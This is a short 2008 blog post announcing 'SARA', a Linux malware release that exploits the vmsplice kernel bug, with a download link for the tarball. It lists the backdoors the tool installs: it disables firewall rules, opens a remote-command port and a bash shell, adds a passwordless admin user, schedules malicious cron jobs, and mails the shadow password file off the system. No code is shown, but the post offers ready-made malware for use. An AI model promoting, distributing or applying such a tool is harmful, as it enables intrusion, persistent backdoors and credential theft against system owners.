Tuesday, February 19, 2008

SARA Linux Malware

Hi all!
I released today a basic malware for to exploit the vmsplice bug on Linux kernel.
This program use the vulnerability for install some backdoors on system.

UPDATED
Actions:
- disable INPUT rules on firewall
- open the 1407 port for execute remote commands
- open a bash session on 14071 port using the xinetd daemon
- add a admin user without password
- schedule malicious tasks on cron
- mail the shadow file for a mail account

Vulnerables systems: Linux 2.6.17 - 2.6.24.1

Warning:
THIS IS A MALWARE. DON'T RUN IT IF YOU DON'T KNOW
WHAT YOU ARE DOING.

Download:
http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz

No comments: